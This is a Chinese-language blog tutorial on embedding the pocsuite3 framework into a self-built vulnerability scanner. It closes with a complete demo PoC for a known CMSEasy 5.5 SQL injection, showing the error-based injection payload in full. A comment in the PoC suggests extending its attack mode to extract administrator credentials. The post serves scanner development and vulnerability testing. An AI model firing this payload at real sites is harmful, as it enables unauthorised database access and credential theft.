将pocsuite集成到扫描器里
前言
网上关于写基于pocsuite相关的poc文章很多,但很少有讲把pocsuite集成到自身扫描器里面的,虽然命令行界面可以美其名曰黑客的仪式感,但扫描器更重要的是考虑将天堂的门票卖给最多的人
pocsuite3的安装
集成到python扫描器里,直接使用pip即可(指定了国内加速镜像)
pip install pocsuite3 -i https://pypi.tuna.tsinghua.edu.cn/simple
基于demo的修改
知道创宇之前有一个pocsuite的介绍文章如何打造自己的PoC框架-Pocsuite3-使用篇,里面有一个集成的demo:
from pocsuite3.api import init_pocsuite
from pocsuite3.api import start_pocsuite
from pocsuite3.api import get_result
from pocsuite3.api import path
import os
config = {
'url': 'https://www.baidu.com/',
'poc': os.path.join(paths.POCSUITE_ROOT_PATH, "../tests/login_demo.py"),
'username': "asd",
'password': 'asdss',
'verbose': 0
}
# config字典的配置和cli命令行参数配置一模一样
init_pocsuite(config)
start_pocsuite()
result = get_results().pop()
print(result)
不过这个demo的导入包有点问题
修改一下
from pocsuite3.api import get_results
from pocsuite3.api import paths
然后poc的路径又出现了问题
'poc': os.path.join(paths.POCSUITE_ROOT_PATH, "../../pocs/test.py")
这里前面拼接的path是
C:\Users\Cl0udG0d\.virtualenvs\SZhe_Scan-oUVMoVqK\lib\site-packages\pocsuite3
我虚拟环境包的位置
使用os.path.dirname(os.path.dirname(__file__))修改其为我当前文件的相对位置
'poc': os.path.join(os.path.dirname(os.path.dirname(__file__)), "../pocs/test.py")
在pocs文件夹下放置所有的poc文件,当需要扫描的时候读取文件夹下的所有POC依次进行扫描即可,当然这个地方也可以使用python的多线程来进行加速了
整个函数为
def scanPoc(url):
config = {
'url': url,
'poc': os.path.join(os.path.dirname(os.path.dirname(__file__)), "../pocs/test.py"),
'verbose': 0
}
print(os.path.dirname(os.path.dirname(__file__)))
# config字典的配置和cli命令行参数配置一模一样
init_pocsuite(config)
start_pocsuite()
result = get_results().pop()
print(result)
最后的result就是我们需要处理的返回结果,将其存储到数据库或者进一步操作,类型是pocsuite团队自己定义的AttribDict字典,通过键值对的方式读取内容
一个poc demo
这里给出一个pocsuite 的 poc demo
我们自定义的poc可以在demo上进行修改即可
#导入所写PoC所需要类/文件,尽量不要使用第三方模块。
#迫不得已使用第三方模块有其依赖规则,后面给出。
from pocsuite3.api import Output,POCBase,register_poc,requests
#PoC实现类,继承POCBase
class DemoPoc(POCBase):
#PoC信息字段,需要完整填写全部下列信息
vulID = '88979' #漏洞编号,若提交漏洞的同时提交PoC,则写成0
version = '1'#PoC版本,默认为1
author = ['blh']#此PoC作者
vulDate = '2014-11-03'#漏洞公开日期
createDate = '2020-01-13'#编写PoC日期
updateDate = '2020-01-13'#更新PoC日期,默认与createDate一样
references = ['https://www.seebug.org/vuldb/ssvid-88979']#漏洞地址来源,0day不写
name = 'CMSEasy 5.5 /celive/live/header.php SQL注入漏洞'#PoC名称
appPowerLink = 'http://www.cmseasy.cn/'#漏洞产商主页
appName = 'CMSEasy'#漏洞应用名称
appVersion = '5.5'#漏洞影响版本
vulType = 'SQL Injection'#漏洞类型
desc = '''漏洞描述'''#在漏洞描述填写
samples = []#测试成功网址
install_requires = []#PoC依赖的第三方模块,尽量不要使用第三方模块,必要时参考后面给出的参考链接
pocDesc = '''PoC用法描述'''#在PoC用法描述填写
#编写验证模式
def _verify(self):
#验证代码
result = {}
target = self.url + '/celive/live/header.php'
#此处payload即为post的数据
payload = {
'xajax': 'LiveMessage',
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
"floor(rand(0)*2),(select md5(614)))a from "
"information_schema.tables group by a)b),"
"'','','','1','127.0.0.1','2') #"
}
# 使用requests发送post请求
response = requests.post(target,payload)
#‘851ddf5058cf22df63d3344ad89919cf’为0614的md5值
if '851ddf5058cf22df63d3344ad89919cf' in str(response.content):
result['VerifyInfo']={}
result['VerifyInfo']['URL'] = target
result['VerifyInfo']['Postdata'] = payload
return self.parse_output(result)
#编写攻击模式,此处直接给到验证模式,读者可以自行写出payload,获取管理员账号密码等信息。
def _attack(self):
return self._verify()
#自定义输出函数,调用框架输出的实例Output
def parse_output(self,result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
#注册PoC类,这样框架才知道这是PoC类
register_poc(DemoPoc)
END
建了一个微信的安全交流群,欢迎添加我微信备注进群,一起来聊天吹水哇,以及一个会发布安全相关内容的公众号,欢迎关注 :)
